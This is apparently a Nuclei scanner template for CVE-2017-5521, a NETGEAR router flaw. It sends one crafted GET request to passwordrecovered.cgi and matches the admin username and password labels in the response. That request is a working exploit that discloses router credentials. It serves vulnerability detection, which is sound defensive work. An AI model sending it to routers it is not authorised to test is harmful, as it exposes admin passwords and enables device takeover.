36 lines
1.2 KiB
YAML
36 lines
1.2 KiB
YAML
id: CVE-2017-5521
|
|
|
|
info:
|
|
name: Bypassing Authentication on NETGEAR Routers
|
|
author: princechaddha
|
|
severity: high
|
|
description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server.
|
|
reference:
|
|
- https://www.cvedetails.com/cve/CVE-2017-5521/
|
|
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
|
|
- http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
|
|
- http://www.securityfocus.com/bid/95457
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.1
|
|
cve-id: CVE-2017-5521
|
|
cwe-id: CWE-200
|
|
tags: cve,cve2017,auth-bypass,netgear
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "right\">Router\\s*Admin\\s*Username<"
|
|
- "right\">Router\\s*Admin\\s*Password<"
|
|
condition: and
|
|
part: body
|
|
- type: status
|
|
status:
|
|
- 200
|